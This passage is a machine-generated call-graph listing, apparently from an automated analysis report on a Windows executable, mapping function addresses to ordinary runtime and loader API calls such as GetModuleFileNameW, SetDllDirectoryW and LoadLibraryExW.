16539->16540 16541 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16540->16541 16541->16538 16543 7ff652ef6521 16542->16543 16544 7ff652ef05e2 16542->16544 16545 7ff652ee5cb4 _get_daylight 11 API calls 16543->16545 16544->16520 16548 7ff652ef6548 16544->16548 16546 7ff652ef6526 16545->16546 16547 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16546->16547 16547->16544 16549 7ff652ef6551 16548->16549 16550 7ff652ef05f3 16548->16550 16551 7ff652ee5cb4 _get_daylight 11 API calls 16549->16551 16550->16520 16550->16528 16552 7ff652ef6556 16551->16552 16553 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16552->16553 16553->16550 16562 7ff652ef11a8 EnterCriticalSection 16554->16562 19486 7ff652edb2dc 19488 7ff652eda5da 19486->19488 19487 7ff652eda656 19488->19487 19490 7ff652edb850 19488->19490 19491 7ff652edb873 19490->19491 19492 7ff652edb88f memcpy_s 19490->19492 19493 7ff652eee3ac 12 API calls 19491->19493 19492->19487 19493->19492 20874 7ff652eed2d0 20885 7ff652ef11a8 EnterCriticalSection 20874->20885 16563 7ff652edc3cc 16584 7ff652edc59c 16563->16584 16566 7ff652edc518 16688 7ff652edc8bc IsProcessorFeaturePresent 16566->16688 16567 7ff652edc3e8 __scrt_acquire_startup_lock 16569 7ff652edc522 16567->16569 16574 7ff652edc406 __scrt_release_startup_lock 16567->16574 16570 7ff652edc8bc 7 API calls 16569->16570 16572 7ff652edc52d __FrameHandler3::FrameUnwindToEmptyState 16570->16572 16571 7ff652edc42b 16573 7ff652edc4b1 16590 7ff652edca04 16573->16590 16574->16571 16574->16573 16677 7ff652eea8e0 16574->16677 16576 7ff652edc4b6 16593 7ff652ed1000 16576->16593 16581 7ff652edc4d9 16581->16572 16684 7ff652edc720 16581->16684 16585 7ff652edc5a4 16584->16585 16586 7ff652edc5b0 __scrt_dllmain_crt_thread_attach 16585->16586 16587 7ff652edc5bd 16586->16587 16589 7ff652edc3e0 16586->16589 16587->16589 16695 7ff652edd1c0 16587->16695 16589->16566 16589->16567 16722 7ff652efb580 16590->16722 16594 7ff652ed100b 16593->16594 16724 7ff652ed89b0 16594->16724 16596 7ff652ed101d 16731 7ff652ee66e8 16596->16731 16598 7ff652ed39ab 16738 7ff652ed1ea0 16598->16738 16602 7ff652edc010 _wfindfirst32i64 8 API calls 16603 7ff652ed3b73 16602->16603 16682 7ff652edca48 GetModuleHandleW 16603->16682 16604 7ff652ed39ca 16671 7ff652ed3ab2 16604->16671 16763 7ff652ed7d70 16604->16763 16606 7ff652ed39ff 16607 7ff652ed3a4b 16606->16607 16609 7ff652ed7d70 61 API calls 16606->16609 16778 7ff652ed8250 16607->16778 16614 7ff652ed3a20 __std_exception_destroy 16609->16614 16610 7ff652ed3a60 16782 7ff652ed1ca0 16610->16782 16613 7ff652ed3b2d 16620 7ff652ed3b8d 16613->16620 16801 7ff652ed8b80 16613->16801 16614->16607 16617 7ff652ed8250 58 API calls 16614->16617 16615 7ff652ed1ca0 121 API calls 16616 7ff652ed3a96 16615->16616 16618 7ff652ed3a9a 16616->16618 16619 7ff652ed3ab7 16616->16619 16617->16607 16901 7ff652ed2b10 16618->16901 16619->16613 16914 7ff652ed4060 16619->16914 16621 7ff652ed3bdb 16620->16621 16620->16671 16825 7ff652ed8de0 16620->16825 16839 7ff652ed6ff0 16621->16839 16626 7ff652ed3bc0 16628 7ff652ed3bce SetDllDirectoryW 16626->16628 16633 7ff652ed3b53 16626->16633 16628->16621 16634 7ff652ed2b10 59 API calls 16633->16634 16634->16671 16636 7ff652ed3ad5 16641 7ff652ed2b10 59 API calls 16636->16641 16638 7ff652ed3bf5 16666 7ff652ed3c27 16638->16666 16946 7ff652ed6800 16638->16946 16639 7ff652ed3b03 16639->16613 16642 7ff652ed3b08 16639->16642 16640 7ff652ed3d11 16843 7ff652ed34a0 16640->16843 16641->16671 16933 7ff652ee097c 16642->16933 16648 7ff652ed3c46 16656 7ff652ed3c88 16648->16656 16982 7ff652ed1ee0 16648->16982 16649 7ff652ed3c29 16650 7ff652ed6a50 FreeLibrary 16649->16650 16650->16666 16653 7ff652ed3cdc 16986 7ff652ed3440 16653->16986 16654 7ff652ed3cb9 PostMessageW GetMessageW 16654->16653 16656->16653 16656->16654 16656->16671 16658 7ff652ed3d2b 16851 7ff652ed81e0 16658->16851 16661 7ff652ed3d3e 16664 7ff652ed7d70 61 API calls 16661->16664 16667 7ff652ed3d4a 16664->16667 16665 7ff652ed3cec 16668 7ff652ed6a50 FreeLibrary 16665->16668 16666->16640 16666->16648 16669 7ff652ed3d7a 16667->16669 16670 7ff652ed3d57 PostMessageW GetMessageW 16667->16670 16668->16671 16858 7ff652ed8290 16669->16858 16670->16669 16671->16602 16678 7ff652eea918 16677->16678 16679 7ff652eea8f7 16677->16679 16680 7ff652eeb188 45 API calls 16678->16680 16679->16573 16681 7ff652eea91d 16680->16681 16683 7ff652edca59 16682->16683 16683->16581 16685 7ff652edc731 16684->16685 16686 7ff652edc4f0 16685->16686 16687 7ff652edd1c0 7 API calls 16685->16687 16686->16571 16687->16686 16689 7ff652edc8e2 _wfindfirst32i64 __scrt_get_show_window_mode 16688->16689 16690 7ff652edc901 RtlCaptureContext RtlLookupFunctionEntry 16689->16690 16691 7ff652edc92a RtlVirtualUnwind 16690->16691 16692 7ff652edc966 __scrt_get_show_window_mode 16690->16692 16691->16692 16693 7ff652edc998 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16692->16693 16694 7ff652edc9e6 _wfindfirst32i64 16693->16694 16694->16569 16696 7ff652edd1d2 16695->16696 16697 7ff652edd1c8 16695->16697 16696->16589 16701 7ff652edd564 16697->16701 16702 7ff652edd573 16701->16702 16703 7ff652edd1cd 16701->16703 16709 7ff652ede560 16702->16709 16705 7ff652edd5d0 16703->16705 16706 7ff652edd5fb 16705->16706 16707 7ff652edd5ff 16706->16707 16708 7ff652edd5de DeleteCriticalSection 16706->16708 16707->16696 16708->16706 16713 7ff652ede3c8 16709->16713 16714 7ff652ede4b2 TlsFree 16713->16714 16720 7ff652ede40c __vcrt_InitializeCriticalSectionEx 16713->16720 16715 7ff652ede43a LoadLibraryExW 16717 7ff652ede45b GetLastError 16715->16717 16718 7ff652ede4d9 16715->16718 16716 7ff652ede4f9 GetProcAddress 16716->16714 16717->16720 16718->16716 16719 7ff652ede4f0 FreeLibrary 16718->16719 16719->16716 16720->16714 16720->16715 16720->16716 16721 7ff652ede47d LoadLibraryExW 16720->16721 16721->16718 16721->16720 16723 7ff652edca1b GetStartupInfoW 16722->16723 16723->16576 16726 7ff652ed89cf 16724->16726 16725 7ff652ed8a20 WideCharToMultiByte 16725->16726 16728 7ff652ed8ac6 16725->16728 16726->16725 16727 7ff652ed8a74 WideCharToMultiByte 16726->16727 16726->16728 16730 7ff652ed89d7 __std_exception_destroy 16726->16730 16727->16726 16727->16728 17020 7ff652ed29c0 16728->17020 16730->16596 16734 7ff652ef0840 16731->16734 16732 7ff652ef0893 16733 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 16732->16733 16737 7ff652ef08bc 16733->16737 16734->16732 16735 7ff652ef08e6 16734->16735 17386 7ff652ef0718 16735->17386 16737->16598 16739 7ff652ed1eb5 16738->16739 16740 7ff652ed1ed0 16739->16740 17394 7ff652ed2870 16739->17394 16740->16671 16742 7ff652ed3f00 16740->16742 16743 7ff652edbfb0 16742->16743 16744 7ff652ed3f0c GetModuleFileNameW 16743->16744 16745 7ff652ed3f55 16744->16745 16746 7ff652ed3f3e 16744->16746 17434 7ff652ed8ef0 16745->17434 16747 7ff652ed29c0 57 API calls 16746->16747 16749 7ff652ed3f51 16747->16749 16753 7ff652edc010 _wfindfirst32i64 8 API calls 16749->16753 16751 7ff652ed3f80 17445 7ff652ed40e0 16751->17445 16752 7ff652ed3f70 16754 7ff652ed2b10 59 API calls 16752->16754 16756 7ff652ed3fd9 16753->16756 16754->16749 16756->16604 16758 7ff652ed1ee0 49 API calls 16759 7ff652ed3fa5 16758->16759 16759->16749 16760 7ff652ed3fac 16759->16760 17453 7ff652ed4340 16760->17453 16764 7ff652ed7d7a 16763->16764 16765 7ff652ed8de0 57 API calls 16764->16765 16766 7ff652ed7d9c GetEnvironmentVariableW 16765->16766 16767 7ff652ed7db4 ExpandEnvironmentStringsW 16766->16767 16768 7ff652ed7e06 16766->16768 16770 7ff652ed8ef0 59 API calls 16767->16770 16769 7ff652edc010 _wfindfirst32i64 8 API calls 16768->16769 16771 7ff652ed7e18 16769->16771 16772 7ff652ed7ddc 16770->16772 16771->16606 16772->16768 16773 7ff652ed7de6 16772->16773 17468 7ff652eeb1bc 16773->17468 16776 7ff652edc010 _wfindfirst32i64 8 API calls 16777 7ff652ed7dfe 16776->16777 16777->16606 16779 7ff652ed8de0 57 API calls 16778->16779 16780 7ff652ed8267 SetEnvironmentVariableW 16779->16780 16781 7ff652ed827f __std_exception_destroy 16780->16781 16781->16610 16783 7ff652ed1cae 16782->16783 16784 7ff652ed1ee0 49 API calls 16783->16784 16785 7ff652ed1ce4 16784->16785 16786 7ff652ed1dce 16785->16786 16787 7ff652ed1ee0 49 API calls 16785->16787 16788 7ff652edc010 _wfindfirst32i64 8 API calls 16786->16788 16789 7ff652ed1d0a 16787->16789 16790 7ff652ed1e5c 16788->16790 16789->16786 17475 7ff652ed1a90 16789->17475 16790->16613 16790->16615 16794 7ff652ed1dbc 16795 7ff652ed3e80 49 API calls 16794->16795 16795->16786 16796 7ff652ed1d7f 16796->16794 16797 7ff652ed1e24 16796->16797 16798 7ff652ed3e80 49 API calls 16797->16798 16799 7ff652ed1e31 16798->16799 17511 7ff652ed4140 16799->17511 16802 7ff652ed8b95 16801->16802 17553 7ff652ed8860 GetCurrentProcess OpenProcessToken 16802->17553 16805 7ff652ed8860 7 API calls 16806 7ff652ed8bc1 16805->16806 16807 7ff652ed8bf4 16806->16807 16808 7ff652ed8bda 16806->16808 16809 7ff652ed8950 48 API calls 16807->16809 17563 7ff652ed8950 16808->17563 16812 7ff652ed8c07 LocalFree LocalFree 16809->16812 16813 7ff652ed8c23 16812->16813 16815 7ff652ed8c2f 16812->16815 17567 7ff652ed2c30 16813->17567 16816 7ff652edc010 _wfindfirst32i64 8 API calls 16815->16816 16817 7ff652ed3b4e 16816->16817 16817->16633 16818 7ff652ed14e0 16817->16818 16821 7ff652ed156f 16818->16821 16823 7ff652ed14f6 16818->16823 16821->16620 17774 7ff652ed7b60 16823->17774 16826 7ff652ed8e01 MultiByteToWideChar 16825->16826 16827 7ff652ed8e87 MultiByteToWideChar 16825->16827 16830 7ff652ed8e4c 16826->16830 16831 7ff652ed8e27 16826->16831 16828 7ff652ed8ecf 16827->16828 16829 7ff652ed8eaa 16827->16829 16828->16626 16832 7ff652ed29c0 55 API calls 16829->16832 16830->16827 16836 7ff652ed8e62 16830->16836 16833 7ff652ed29c0 55 API calls 16831->16833 16834 7ff652ed8ebd 16832->16834 16835 7ff652ed8e3a 16833->16835 16834->16626 16835->16626 16837 7ff652ed29c0 55 API calls 16836->16837 16838 7ff652ed8e75 16837->16838 16838->16626 16840 7ff652ed7005 16839->16840 16841 7ff652ed3be0 16840->16841 16842 7ff652ed2870 59 API calls 16840->16842 16841->16666 16937 7ff652ed6ca0 16841->16937 16842->16841 16847 7ff652ed3513 16843->16847 16849 7ff652ed3554 16843->16849 16844 7ff652edc010 _wfindfirst32i64 8 API calls 16845 7ff652ed35a5 16844->16845 16845->16671 16850 7ff652ed8b50 LocalFree 16845->16850 16847->16849 18097 7ff652ed1700 16847->18097 18139 7ff652ed2d50 16847->18139 16849->16844 16850->16658 16852 7ff652ed8de0 57 API calls 16851->16852 16853 7ff652ed81ff 16852->16853 16854 7ff652ed8de0 57 API calls 16853->16854 16855 7ff652ed820f 16854->16855 16856 7ff652ee8610 38 API calls 16855->16856 16857 7ff652ed821d __std_exception_destroy 16856->16857 16857->16661 16859 7ff652ed82a0 16858->16859 16902 7ff652ed2b30 16901->16902 16903 7ff652ee52b4 49 API calls 16902->16903 16904 7ff652ed2b7b __scrt_get_show_window_mode 16903->16904 16905 7ff652ed8de0 57 API calls 16904->16905 16906 7ff652ed2bb0 16905->16906 16907 7ff652ed2bb5 16906->16907 16908 7ff652ed2bed MessageBoxA 16906->16908 16909 7ff652ed8de0 57 API calls 16907->16909 16910 7ff652ed2c07 16908->16910 16911 7ff652ed2bcf MessageBoxW 16909->16911 16912 7ff652edc010 _wfindfirst32i64 8 API calls 16910->16912 16911->16910 16913 7ff652ed2c17 16912->16913 16913->16671 16915 7ff652ed406c 16914->16915 16916 7ff652ed8de0 57 API calls 16915->16916 16917 7ff652ed4097 16916->16917 16918 7ff652ed8de0 57 API calls 16917->16918 16919 7ff652ed40aa 16918->16919 18667 7ff652ee69e4 16919->18667 16922 7ff652edc010 _wfindfirst32i64 8 API calls 16923 7ff652ed3acd 16922->16923 16923->16636 16924 7ff652ed84c0 16923->16924 16925 7ff652ed84e4 16924->16925 16926 7ff652ee1004 73 API calls 16925->16926 16927 7ff652ed85bb __std_exception_destroy 16925->16927 16928 7ff652ed84fe 16926->16928 16927->16639 16928->16927 19046 7ff652ee9894 16928->19046 16934 7ff652ee09ac 16933->16934 19061 7ff652ee0758 16934->19061 16939 7ff652ed6cc3 16937->16939 16940 7ff652ed6cda 16937->16940 16939->16940 19072 7ff652ed1590 16939->19072 16940->16638 16941 7ff652ed6ce4 16941->16940 16942 7ff652ed4140 49 API calls 16941->16942 16943 7ff652ed6d45 16942->16943 16944 7ff652ed2b10 59 API calls 16943->16944 16945 7ff652ed6db5 __std_exception_destroy memcpy_s 16943->16945 16944->16940 16945->16638 16954 7ff652ed681a memcpy_s 16946->16954 16948 7ff652ed693f 16950 7ff652ed4140 49 API calls 16948->16950 16949 7ff652ed695b 16951 7ff652ed2b10 59 API calls 16949->16951 16952 7ff652ed69b8 16950->16952 16958 7ff652ed6951 __std_exception_destroy 16951->16958 16956 7ff652ed4140 49 API calls 16952->16956 16953 7ff652ed4140 49 API calls 16953->16954 16954->16948 16954->16949 16954->16953 16955 7ff652ed6920 16954->16955 16963 7ff652ed1700 135 API calls 16954->16963 16964 7ff652ed6941 16954->16964 19096 7ff652ed1940 16954->19096 16955->16948 16959 7ff652ed4140 49 API calls 16955->16959 16957 7ff652ed69e8 16956->16957 16962 7ff652ed4140 49 API calls 16957->16962 16960 7ff652edc010 _wfindfirst32i64 8 API calls 16958->16960 16959->16948 16961 7ff652ed3c06 16960->16961 16961->16649 16966 7ff652ed6780 16961->16966 16962->16958 16963->16954 16965 7ff652ed2b10 59 API calls 16964->16965 16965->16958 19100 7ff652ed8470 16966->19100 16968 7ff652ed679c 16969 7ff652ed8470 58 API calls 16968->16969 16970 7ff652ed67af 16969->16970 16971 7ff652ed67e5 16970->16971 16972 7ff652ed67c7 16970->16972 16973 7ff652ed2b10 59 API calls 16971->16973 19104 7ff652ed7100 GetProcAddress 16972->19104 16975 7ff652ed3c14 16973->16975 16975->16649 16983 7ff652ed1f05 16982->16983 16984 7ff652ee52b4 49 API calls 16983->16984 16985 7ff652ed1f28 16984->16985 16985->16656 19163 7ff652ed5dd0 16986->19163 16989 7ff652ed348d 16989->16665 17039 7ff652edbfb0 17020->17039 17023 7ff652ed2a09 17041 7ff652ee52b4 17023->17041 17028 7ff652ed1ee0 49 API calls 17029 7ff652ed2a66 __scrt_get_show_window_mode 17028->17029 17030 7ff652ed8de0 54 API calls 17029->17030 17031 7ff652ed2a9b 17030->17031 17032 7ff652ed2aa0 17031->17032 17033 7ff652ed2ad8 MessageBoxA 17031->17033 17034 7ff652ed8de0 54 API calls 17032->17034 17035 7ff652ed2af2 17033->17035 17036 7ff652ed2aba MessageBoxW 17034->17036 17037 7ff652edc010 _wfindfirst32i64 8 API calls 17035->17037 17036->17035 17038 7ff652ed2b02 17037->17038 17038->16730 17040 7ff652ed29dc GetLastError 17039->17040 17040->17023 17045 7ff652ee530e 17041->17045 17042 7ff652ee5333 17043 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17042->17043 17058 7ff652ee535d 17043->17058 17044 7ff652ee536f 17071 7ff652ee3540 17044->17071 17045->17042 17045->17044 17048 7ff652ee544c 17050 7ff652eeb700 __free_lconv_mon 11 API calls 17048->17050 17049 7ff652edc010 _wfindfirst32i64 8 API calls 17051 7ff652ed2a37 17049->17051 17050->17058 17059 7ff652ed8770 17051->17059 17052 7ff652ee5421 17055 7ff652eeb700 __free_lconv_mon 11 API calls 17052->17055 17053 7ff652ee5470 17053->17048 17054 7ff652ee547a 17053->17054 17057 7ff652eeb700 __free_lconv_mon 11 API calls 17054->17057 17055->17058 17056 7ff652ee5418 17056->17048 17056->17052 17057->17058 17058->17049 17060 7ff652ed877c 17059->17060 17061 7ff652ed879d FormatMessageW 17060->17061 17062 7ff652ed8797 GetLastError 17060->17062 17063 7ff652ed87d0 17061->17063 17064 7ff652ed87ec WideCharToMultiByte 17061->17064 17062->17061 17067 7ff652ed29c0 54 API calls 17063->17067 17065 7ff652ed87e3 17064->17065 17066 7ff652ed8826 17064->17066 17069 7ff652edc010 _wfindfirst32i64 8 API calls 17065->17069 17068 7ff652ed29c0 54 API calls 17066->17068 17067->17065 17068->17065 17070 7ff652ed2a3e 17069->17070 17070->17028 17072 7ff652ee357e 17071->17072 17073 7ff652ee356e 17071->17073 17074 7ff652ee3587 17072->17074 17081 7ff652ee35b5 17072->17081 17076 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17073->17076 17077 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17074->17077 17075 7ff652ee35ad 17075->17048 17075->17052 17075->17053 17075->17056 17076->17075 17077->17075 17080 7ff652ee3864 17083 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17080->17083 17081->17073 17081->17075 17081->17080 17085 7ff652ee3ed0 17081->17085 17111 7ff652ee3b98 17081->17111 17141 7ff652ee3420 17081->17141 17144 7ff652ee50f0 17081->17144 17083->17073 17086 7ff652ee3f12 17085->17086 17087 7ff652ee3f85 17085->17087 17090 7ff652ee3faf 17086->17090 17091 7ff652ee3f18 17086->17091 17088 7ff652ee3fdf 17087->17088 17089 7ff652ee3f8a 17087->17089 17088->17090 17102 7ff652ee3fee 17088->17102 17109 7ff652ee3f48 17088->17109 17092 7ff652ee3fbf 17089->17092 17093 7ff652ee3f8c 17089->17093 17168 7ff652ee2480 17090->17168 17098 7ff652ee3f1d 17091->17098 17091->17102 17175 7ff652ee2070 17092->17175 17094 7ff652ee3f2d 17093->17094 17101 7ff652ee3f9b 17093->17101 17110 7ff652ee401d 17094->17110 17150 7ff652ee4834 17094->17150 17098->17094 17100 7ff652ee3f60 17098->17100 17098->17109 17100->17110 17160 7ff652ee4cf0 17100->17160 17101->17090 17103 7ff652ee3fa0 17101->17103 17102->17110 17182 7ff652ee2890 17102->17182 17103->17110 17164 7ff652ee4e88 17103->17164 17105 7ff652edc010 _wfindfirst32i64 8 API calls 17107 7ff652ee42b3 17105->17107 17107->17081 17109->17110 17189 7ff652eef608 17109->17189 17110->17105 17112 7ff652ee3ba3 17111->17112 17113 7ff652ee3bb9 17111->17113 17115 7ff652ee3f12 17112->17115 17116 7ff652ee3f85 17112->17116 17123 7ff652ee3bf7 17112->17123 17114 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17113->17114 17113->17123 17114->17123 17119 7ff652ee3faf 17115->17119 17120 7ff652ee3f18 17115->17120 17117 7ff652ee3fdf 17116->17117 17118 7ff652ee3f8a 17116->17118 17117->17119 17131 7ff652ee3fee 17117->17131 17139 7ff652ee3f48 17117->17139 17121 7ff652ee3fbf 17118->17121 17122 7ff652ee3f8c 17118->17122 17124 7ff652ee2480 38 API calls 17119->17124 17127 7ff652ee3f1d 17120->17127 17120->17131 17125 7ff652ee2070 38 API calls 17121->17125 17129 7ff652ee3f9b 17122->17129 17135 7ff652ee3f2d 17122->17135 17123->17081 17124->17139 17125->17139 17126 7ff652ee4834 47 API calls 17126->17139 17130 7ff652ee3f60 17127->17130 17127->17135 17127->17139 17128 7ff652ee2890 38 API calls 17128->17139 17129->17119 17132 7ff652ee3fa0 17129->17132 17133 7ff652ee4cf0 47 API calls 17130->17133 17140 7ff652ee401d 17130->17140 17131->17128 17131->17140 17136 7ff652ee4e88 37 API calls 17132->17136 17132->17140 17133->17139 17134 7ff652edc010 _wfindfirst32i64 8 API calls 17137 7ff652ee42b3 17134->17137 17135->17126 17135->17140 17136->17139 17137->17081 17138 7ff652eef608 47 API calls 17138->17139 17139->17138 17139->17140 17140->17134 17345 7ff652ee1644 17141->17345 17145 7ff652ee5107 17144->17145 17362 7ff652eee768 17145->17362 17151 7ff652ee4856 17150->17151 17199 7ff652ee14b0 17151->17199 17156 7ff652ee50f0 45 API calls 17157 7ff652ee4993 17156->17157 17158 7ff652ee50f0 45 API calls 17157->17158 17159 7ff652ee4a1c 17157->17159 17158->17159 17159->17109 17161 7ff652ee4d08 17160->17161 17163 7ff652ee4d70 17160->17163 17162 7ff652eef608 47 API calls 17161->17162 17161->17163 17162->17163 17163->17109 17165 7ff652ee4ea9 17164->17165 17166 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17165->17166 17167 7ff652ee4eda 17165->17167 17166->17167 17167->17109 17169 7ff652ee24b3 17168->17169 17170 7ff652ee24e2 17169->17170 17172 7ff652ee259f 17169->17172 17171 7ff652ee14b0 12 API calls 17170->17171 17174 7ff652ee251f 17170->17174 17171->17174 17173 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17172->17173 17173->17174 17174->17109 17176 7ff652ee20a3 17175->17176 17177 7ff652ee20d2 17176->17177 17179 7ff652ee218f 17176->17179 17178 7ff652ee14b0 12 API calls 17177->17178 17181 7ff652ee210f 17177->17181 17178->17181 17180 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17179->17180 17180->17181 17181->17109 17183 7ff652ee28c3 17182->17183 17184 7ff652ee28f2 17183->17184 17186 7ff652ee29af 17183->17186 17185 7ff652ee14b0 12 API calls 17184->17185 17188 7ff652ee292f 17184->17188 17185->17188 17187 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17186->17187 17187->17188 17188->17109 17190 7ff652eef630 17189->17190 17191 7ff652eef675 17190->17191 17193 7ff652ee50f0 45 API calls 17190->17193 17194 7ff652eef635 __scrt_get_show_window_mode 17190->17194 17195 7ff652eef65e __scrt_get_show_window_mode 17190->17195 17191->17194 17191->17195 17342 7ff652ef1640 17191->17342 17192 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17192->17194 17193->17191 17194->17109 17195->17192 17195->17194 17200 7ff652ee14e7 17199->17200 17206 7ff652ee14d6 17199->17206 17200->17206 17229 7ff652eee3ac 17200->17229 17203 7ff652eeb700 __free_lconv_mon 11 API calls 17205 7ff652ee1528 17203->17205 17204 7ff652eeb700 __free_lconv_mon 11 API calls 17204->17206 17205->17204 17207 7ff652eef320 17206->17207 17208 7ff652eef370 17207->17208 17209 7ff652eef33d 17207->17209 17208->17209 17211 7ff652eef3a2 17208->17211 17210 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17209->17210 17226 7ff652ee4971 17210->17226 17217 7ff652eef4b5 17211->17217 17219 7ff652eef3ea 17211->17219 17212 7ff652eef5a7 17269 7ff652eee80c 17212->17269 17214 7ff652eef56d 17262 7ff652eeeba4 17214->17262 17216 7ff652eef53c 17255 7ff652eeee84 17216->17255 17217->17212 17217->17214 17217->17216 17220 7ff652eef4ff 17217->17220 17221 7ff652eef4f5 17217->17221 17219->17226 17236 7ff652eeb25c 17219->17236 17245 7ff652eef0b4 17220->17245 17221->17214 17223 7ff652eef4fa 17221->17223 17223->17216 17223->17220 17226->17156 17226->17157 17227 7ff652eeb6b8 _wfindfirst32i64 17 API calls 17228 7ff652eef604 17227->17228 17230 7ff652eee3bb _get_daylight 17229->17230 17231 7ff652eee3f7 17229->17231 17230->17231 17232 7ff652eee3de HeapAlloc 17230->17232 17235 7ff652ef43e0 _get_daylight 2 API calls 17230->17235 17233 7ff652ee5cb4 _get_daylight 11 API calls 17231->17233 17232->17230 17234 7ff652ee1514 17232->17234 17233->17234 17234->17203 17234->17205 17235->17230 17237 7ff652eeb273 17236->17237 17238 7ff652eeb269 17236->17238 17239 7ff652ee5cb4 _get_daylight 11 API calls 17237->17239 17238->17237 17243 7ff652eeb28e 17238->17243 17240 7ff652eeb27a 17239->17240 17242 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17240->17242 17241 7ff652eeb286 17241->17226 17241->17227 17242->17241 17243->17241 17244 7ff652ee5cb4 _get_daylight 11 API calls 17243->17244 17244->17240 17278 7ff652ef4efc 17245->17278 17249 7ff652eef15c 17250 7ff652eef1b1 17249->17250 17252 7ff652eef17c 17249->17252 17254 7ff652eef160 17249->17254 17331 7ff652eeeca0 17250->17331 17327 7ff652eeef5c 17252->17327 17254->17226 17256 7ff652ef4efc 38 API calls 17255->17256 17257 7ff652eeeece 17256->17257 17258 7ff652ef4944 37 API calls 17257->17258 17259 7ff652eeef1e 17258->17259 17260 7ff652eeef22 17259->17260 17261 7ff652eeef5c 45 API calls 17259->17261 17260->17226 17261->17260 17263 7ff652ef4efc 38 API calls 17262->17263 17264 7ff652eeebef 17263->17264 17265 7ff652ef4944 37 API calls 17264->17265 17266 7ff652eeec47 17265->17266 17267 7ff652eeec4b 17266->17267 17268 7ff652eeeca0 45 API calls 17266->17268 17267->17226 17268->17267 17270 7ff652eee884 17269->17270 17271 7ff652eee851 17269->17271 17273 7ff652eee89c 17270->17273 17276 7ff652eee91d 17270->17276 17272 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17271->17272 17275 7ff652eee87d __scrt_get_show_window_mode 17272->17275 17274 7ff652eeeba4 46 API calls 17273->17274 17274->17275 17275->17226 17276->17275 17277 7ff652ee50f0 45 API calls 17276->17277 17277->17275 17279 7ff652ef4f4f fegetenv 17278->17279 17280 7ff652ef8e5c 37 API calls 17279->17280 17283 7ff652ef4fa2 17280->17283 17281 7ff652ef5092 17284 7ff652ef8e5c 37 API calls 17281->17284 17282 7ff652ef4fcf 17286 7ff652eeb25c __std_exception_copy 37 API calls 17282->17286 17283->17281 17287 7ff652ef506c 17283->17287 17288 7ff652ef4fbd 17283->17288 17285 7ff652ef50bc 17284->17285 17289 7ff652ef8e5c 37 API calls 17285->17289 17290 7ff652ef504d 17286->17290 17291 7ff652eeb25c __std_exception_copy 37 API calls 17287->17291 17288->17281 17288->17282 17292 7ff652ef50cd 17289->17292 17293 7ff652ef6174 17290->17293 17298 7ff652ef5055 17290->17298 17291->17290 17295 7ff652ef9050 20 API calls 17292->17295 17294 7ff652eeb6b8 _wfindfirst32i64 17 API calls 17293->17294 17296 7ff652ef6189 17294->17296 17305 7ff652ef5136 __scrt_get_show_window_mode 17295->17305 17297 7ff652edc010 _wfindfirst32i64 8 API calls 17299 7ff652eef101 17297->17299 17298->17297 17323 7ff652ef4944 17299->17323 17300 7ff652ef54df __scrt_get_show_window_mode 17301 7ff652ef581f 17302 7ff652ef4a60 37 API calls 17301->17302 17309 7ff652ef5f37 17302->17309 17303 7ff652ef5177 memcpy_s 17319 7ff652ef5abb memcpy_s __scrt_get_show_window_mode 17303->17319 17320 7ff652ef55d3 memcpy_s __scrt_get_show_window_mode 17303->17320 17304 7ff652ef57cb 17304->17301 17306 7ff652ef618c memcpy_s 37 API calls 17304->17306 17305->17300 17305->17303 17307 7ff652ee5cb4 _get_daylight 11 API calls 17305->17307 17306->17301 17308 7ff652ef55b0 17307->17308 17310 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17308->17310 17311 7ff652ef5f92 17309->17311 17313 7ff652ef618c memcpy_s 37 API calls 17309->17313 17310->17303 17312 7ff652ef6118 17311->17312 17321 7ff652ef4a60 37 API calls 17311->17321 17322 7ff652ef618c memcpy_s 37 API calls 17311->17322 17315 7ff652ef8e5c 37 API calls 17312->17315 17313->17311 17314 7ff652ee5cb4 11 API calls _get_daylight 17314->17320 17315->17298 17316 7ff652ee5cb4 11 API calls _get_daylight 17316->17319 17317 7ff652eeb698 37 API calls _invalid_parameter_noinfo 17317->17319 17318 7ff652eeb698 37 API calls _invalid_parameter_noinfo 17318->17320 17319->17301 17319->17304 17319->17316 17319->17317 17320->17304 17320->17314 17320->17318 17321->17311 17322->17311 17324 7ff652ef4963 17323->17324 17325 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17324->17325 17326 7ff652ef498e memcpy_s 17324->17326 17325->17326 17326->17249 17328 7ff652eeef88 memcpy_s 17327->17328 17328->17328 17329 7ff652ee50f0 45 API calls 17328->17329 17330 7ff652eef042 memcpy_s __scrt_get_show_window_mode 17328->17330 17329->17330 17330->17254 17332 7ff652eeecdb 17331->17332 17333 7ff652eeed28 memcpy_s 17331->17333 17334 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17332->17334 17336 7ff652eeed93 17333->17336 17338 7ff652ee50f0 45 API calls 17333->17338 17335 7ff652eeed07 17334->17335 17335->17254 17337 7ff652eeb25c __std_exception_copy 37 API calls 17336->17337 17341 7ff652eeedd5 memcpy_s 17337->17341 17338->17336 17339 7ff652eeb6b8 _wfindfirst32i64 17 API calls 17340 7ff652eeee80 17339->17340 17341->17339 17344 7ff652ef1664 WideCharToMultiByte 17342->17344 17346 7ff652ee1683 17345->17346 17347 7ff652ee1671 17345->17347 17349 7ff652ee1690 17346->17349 17353 7ff652ee16cd 17346->17353 17348 7ff652ee5cb4 _get_daylight 11 API calls 17347->17348 17350 7ff652ee1676 17348->17350 17351 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17349->17351 17352 7ff652eeb698 